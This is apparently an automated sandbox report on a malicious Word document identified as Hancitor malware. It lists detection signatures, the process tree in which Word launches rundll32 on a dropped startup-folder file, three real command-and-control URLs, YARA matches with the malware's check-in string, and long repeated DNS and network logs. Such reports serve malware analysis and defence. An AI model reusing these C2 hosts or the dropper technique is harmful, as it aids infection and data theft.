Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0524_4109399728218.doc

Overview

General Information

Sample Name:0524_4109399728218.doc
Analysis ID:854354
MD5:14f4c470c207e22c3b0a4efa7b4200e8
SHA1:21180195396580a9ade32b589490cf3bc94d3b5b
SHA256:0b22278ddb598d63f07eb983bcf307e0852cd3005c5bc15d4a4f26455562c8ec
Infos:

Detection

CryptOne, Hancitor
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Yara detected CryptOne packer
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected Hancitor
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Document contains OLE streams with names of living off the land binaries
Machine Learning detection for sample
May check the online IP address of the machine
Document exploit detected (process start blacklist hit)
Office process drops PE file
Contains functionality to modify clipboard data
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded macro with GUI obfuscation
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Document misses a certain OLE stream usually present in this Microsoft Office document type
Document contains an ObjectPool stream indicating possible embedded files or OLE objects
Drops files with a non-matching file extension (content does not match file extension)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Yara detected Keylogger Generic
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality for read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Yara signature match
Found potential string decryption / allocating functions
Document contains an embedded VBA macro which executes code when the document is opened / closed
Contains functionality to call native functions
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Extensive use of GetProcAddress (often used to hide API calls)
Potential key logger detected (key state polling based)
Document contains embedded VBA macros
Contains functionality to detect sandboxes (mouse cursor move detection)
Uses Microsoft's Enhanced Cryptographic Provider
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w10x64_ra
  • WINWORD.EXE (PID: 6280 cmdline: C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\0524_4109399728218.doc" /o " MD5: D244700A767CE9846760CA8AA9574EDE)
    • splwow64.exe (PID: 6460 cmdline: C:\Windows\splwow64.exe 12288 MD5: 7FE20527607797A8DADE19838B8B1573)
    • rundll32.exe (PID: 6600 cmdline: rundll32.exe c:\users\user\appdata\roaming\microsoft\word\startup\ket.t,EUAYKIYBPAX MD5: F68AF942FD7CCC0E7BAB1A2335D2AD26)
      • rundll32.exe (PID: 6624 cmdline: rundll32.exe c:\users\user\appdata\roaming\microsoft\word\startup\ket.t,EUAYKIYBPAX MD5: D0432468FA4B7F66166C430E1334DBDA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
HancitorHancitor(aka Chanitor) emerged in 2013 which spread via social engineering techniques mainly through phishing mails embedded with malicious link and weaponized Microsoft office document contains malicious macro in it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor

Malware Configuration

Threatname: Hancitor

{"Campaign Id": "2405_pin43", "C2 list": ["http://thowerteigime.com/8/forum.php", "http://euvereginumet.ru/8/forum.php", "http://rhopulforopme.ru/8/forum.php"]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
0524_4109399728218.docINDICATOR_OLE_ObjectPool_Embedded_FilesDetects OLE documents with ObjectPool OLE storage and embed suspicous excutable filesditekSHen
  • 0x8c380:$s1: ObjectPool
  • 0x8de02:$s2: Ole10Native
  • 0x8c200:$s3: Root Entry
  • 0x8c380:$h1: 4F 00 62 00 6A 00 65 00 63 00 74 00 50 00 6F 00 6F 00 6C 00
  • 0x8de02:$h2: 4F 00 6C 00 65 00 31 00 30 00 4E 00 61 00 74 00 69 00 76 00 65 00
  • 0x8c200:$h3: 52 00 6F 00 6F 00 74 00 20 00 45 00 6E 00 74 00 72 00 79 00
  • 0x8c44d:$olepkg: 00 00 00 0C 00 03 00 00 00 00 00 C0 00 00 00 00 00 00 46
  • 0x14260e:$fa_exe: .exe
  • 0x941a8:$fa_dll: .dll
  • 0x9bce8:$fa_dll: .dll
  • 0x9ce14:$fa_dll: .dll
  • 0xb3d7e:$fa_dll: .DLL
  • 0xbd8c8:$fa_dll: .dll
  • 0xbedd4:$fa_dll: .dll
  • 0xbf65b:$fa_dll: .dll
  • 0xc56d2:$fa_dll: .DLL
  • 0xc7ac4:$fa_dll: .dll
  • 0xc883d:$fa_dll: .dll
  • 0xdc924:$fa_dll: .dll
  • 0xde736:$fa_dll: .dll
  • 0xe0390:$fa_dll: .dll

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CryptYara detected CryptOne packerJoe Security
    00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_HancitorYara detected HancitorJoe Security
      00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Hancitor_6738d84aunknownunknown
      • 0x336c:$a1: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d
      • 0x33ac:$a1: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d
      • 0x3438:$b1: Rundll32.exe %s, start
      • 0x3560:$b2: MASSLoader.dll
      00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_HancitorYara detected HancitorJoe Security
        00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Hancitor_6738d84aunknownunknown
        • 0x41f8:$a1: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d
        • 0x4238:$a1: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d
        • 0x42c4:$b1: Rundll32.exe %s, start
        • 0x43ec:$b2: MASSLoader.dll
        Click to see the 7 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.rundll32.exe.28e0000.2.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
          5.2.rundll32.exe.42d0000.3.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
            5.2.rundll32.exe.28e0000.2.unpackWindows_Trojan_Hancitor_6738d84aunknownunknown
            • 0x25f8:$a1: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d
            • 0x2638:$a1: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d
            • 0x26c4:$b1: Rundll32.exe %s, start
            • 0x27ec:$b2: MASSLoader.dll
            5.2.rundll32.exe.28d0174.1.unpackJoeSecurity_HancitorYara detected HancitorJoe Security
              5.2.rundll32.exe.28e0000.2.unpackHancitorHancitor Payloadkevoreilly
              • 0x56f:$decrypt3: 8B 45 FC 33 D2 B9 08 00 00 00 F7 F1 8B 45 08 0F BE 0C 10 8B 55 08 03 55 FC 0F BE 02 33 C1 8B 4D 08 03 4D FC 88 01 EB C7
              Click to see the 13 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:1.1.1.1192.168.2.253575362018316 04/26/23-12:39:11.196625
              SID:2018316
              Source Port:53
              Destination Port:57536
              Protocol:UDP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://rhopulforopme.ru/8/forum.phpme.ru/8/forum.phpeAvira URL Cloud: Label: malware
              Source: http://euvereginumet.ru/8/forum.phpme.ru/8/forum.phpAvira URL Cloud: Label: malware
              Source: http://thowerteigime.com/8/forum.phpvAvira URL Cloud: Label: malware
              Source: http://thowerteigime.com/8/forum.phpe.ru/8/forum.phpeAvira URL Cloud: Label: malware
              Source: http://thowerteigime.com/8/forum.phporopme.ru5Avira URL Cloud: Label: malware
              Source: http://rhopulforopme.ru/8/forum.phpe.ru/8/forum.phpAvira URL Cloud: Label: malware
              Source: http://rhopulforopme.ru/8/forum.php.ru/8/forum.phAvira URL Cloud: Label: malware
              Source: http://rhopulforopme.ru/8/forum.phpet.ru/8/forum.phpAvira URL Cloud: Label: malware
              Source: http://euvereginumet.ru/8/forum.phpt.ru/8/forum.phpAvira URL Cloud: Label: malware
              Source: http://thowerteigime.com/8/forum.phpe.ru/8/forum.phpsAvira URL Cloud: Label: malware
              Source: http://rhopulforopme.ru/8/forum.phpvAvira URL Cloud: Label: malware
              Source: http://rhopulforopme.ru/8/forum.php7Avira URL Cloud: Label: malware
              Source: http://thowerteigime.com/8/forum.phpAvira URL Cloud: Label: malware
              Source: http://thowerteigime.com/8/forum.phpe.ru/8/forum.php7Avira URL Cloud: Label: malware
              Source: http://rhopulforopme.ru/8/forum.phpme.ru/8/forum.phpAvira URL Cloud: Label: malware
              Source: http://euvereginumet.ru/8/forum.phpteigime.com5Avira URL Cloud: Label: malware
              Source: http://euvereginumet.ru/8/forum.phpAvira URL Cloud: Label: malware
              Source: http://euvereginumet.ru/8/forum.phpeAvira URL Cloud: Label: malware
              Source: http://rhopulforopme.ru/8/forum.phpeAvira URL Cloud: Label: malware
              Source: http://thowerteigime.com/8/forum.phpt.ru/8/forum.phpeAvira URL Cloud: Label: malware
              Source: http://euvereginumet.ru/8/forum.phpjAvira URL Cloud: Label: malware
              Source: http://thowerteigime.com/8/forum.phpe.ru/8/forum.phpAvira URL Cloud: Label: malware
              Source: http://euvereginumet.ru/8/forum.phplAvira URL Cloud: Label: malware
              Source: http://rhopulforopme.ru/8/forum.phpjAvira URL Cloud: Label: malware
              Source: http://rhopulforopme.ru/8/forum.phplAvira URL Cloud: Label: malware
              Source: http://euvereginumet.ru/8/forum.phpsAvira URL Cloud: Label: malware
              Source: http://rhopulforopme.ru/8/forum.phpsAvira URL Cloud: Label: malware
              Source: http://rhopulforopme.ru/8/forum.phpConAvira URL Cloud: Label: malware
              Source: http://thowerteigime.com/8/forum.phper$Avira URL Cloud: Label: malware
              Source: http://euvereginumet.ru/8/forum.php7Avira URL Cloud: Label: malware
              Source: http://euvereginumet.ru/8/forum.phpConAvira URL Cloud: Label: malware
              Source: http://rhopulforopme.ru/8/forum.phpginumet.ru5Avira URL Cloud: Label: malware
              Source: http://thowerteigime.com/8/forum.phpConAvira URL Cloud: Label: malware
              Source: http://rhopulforopme.ru/8/forum.phpAvira URL Cloud: Label: malware
              Source: http://euvereginumet.ru/8/forum.php.ru/8/forum.phAvira URL Cloud: Label: malware
              Source: http://thowerteigime.com/8/forum.php.ru/8/forum.phAvira URL Cloud: Label: malware
              Source: http://thowerteigime.com/8/forum.phplAvira URL Cloud: Label: malware
              Source: http://thowerteigime.com/8/forum.phporopme.rucAvira URL Cloud: Label: malware
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{C2D2D63F-941A-4D9F-9B45-35DA529A3C61}.tmpAvira: detection malicious, Label: HEUR/AGEN.1328612
              Found malware configuration
              Source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Hancitor {"Campaign Id": "2405_pin43", "C2 list": ["http://thowerteigime.com/8/forum.php", "http://euvereginumet.ru/8/forum.php", "http://rhopulforopme.ru/8/forum.php"]}
              Multi AV Scanner detection for submitted file
              Source: 0524_4109399728218.docVirustotal: Detection: 65%Perma Link
              Source: 0524_4109399728218.docReversingLabs: Detection: 65%
              Antivirus / Scanner detection for submitted sample
              Source: 0524_4109399728218.docAvira: detected
              Multi AV Scanner detection for domain / URL
              Source: thowerteigime.comVirustotal: Detection: 15%Perma Link
              Source: euvereginumet.ruVirustotal: Detection: 10%Perma Link
              Source: rhopulforopme.ruVirustotal: Detection: 13%Perma Link
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\{9C081570-F32B-46C7-9B47-B1E0B2DF993E}\jax.kReversingLabs: Detection: 76%
              Source: c:\users\user\appdata\roaming\microsoft\word\startup\ket.t (copy)ReversingLabs: Detection: 76%
              Machine Learning detection for sample
              Source: 0524_4109399728218.docJoe Sandbox ML: detected
              Source: 5.2.rundll32.exe.42d0000.3.unpackAvira: Label: TR/Hijacker.Gen
              Source: 5.2.rundll32.exe.28d0174.1.unpackAvira: Label: TR/Kazy.4159236

              Location Tracking

              barindex
              Yara detected Hancitor
              Source: Yara matchFile source: 5.2.rundll32.exe.28e0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.42d0000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.28d0174.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.28e0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.42d0000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.28d0174.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6624, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_042D2CD0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_042D2CD0
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_042D2D17 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_042D2D17
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_042D2D78 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_042D2D78
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_042D2D55 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_042D2D55
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_042D2D98 CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,5_2_042D2D98
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027D8948 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,5_2_027D8948
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_027D55A4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,5_2_027D55A4

              Software Vulnerabilities

              barindex
              Document exploit detected (drops PE files)
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: jax.k.1.drJump to dropped file
              Document exploit detected (process start blacklist hit)
              Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\System32\rundll32.exe
              Source: global trafficTCP traffic: 192.168.2.2:49759 -> 64.185.227.155:80
              Source: global trafficTCP traffic: 64.185.227.155:80 -> 192.168.2.2:49759
              Source: global trafficTCP traffic: 192.168.2.2:49759 -> 64.185.227.155:80
              Source: global trafficTCP traffic: 192.168.2.2:49759 -> 64.185.227.155:80
              Source: global trafficTCP traffic: 64.185.227.155:80 -> 192.168.2.2:49759
              Source: global trafficTCP traffic: 64.185.227.155:80 -> 192.168.2.2:49759
              Source: global trafficTCP traffic: 192.168.2.2:49759 -> 64.185.227.155:80
              Source: global trafficTCP traffic: 64.185.227.155:80 -> 192.168.2.2:49759
              Source: global trafficTCP traffic: 192.168.2.2:49759 -> 64.185.227.155:80
              Source: global trafficTCP traffic: 192.168.2.2:49759 -> 64.185.227.155:80
              Source: global trafficTCP traffic: 64.185.227.155:80 -> 192.168.2.2:49759
              Source: global trafficDNS query: name: api.ipify.org
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
              Source: global trafficDNS query: name: thowerteigime.com
              Source: global trafficDNS query: name: euvereginumet.ru
              Source: global trafficDNS query: name: rhopulforopme.ru
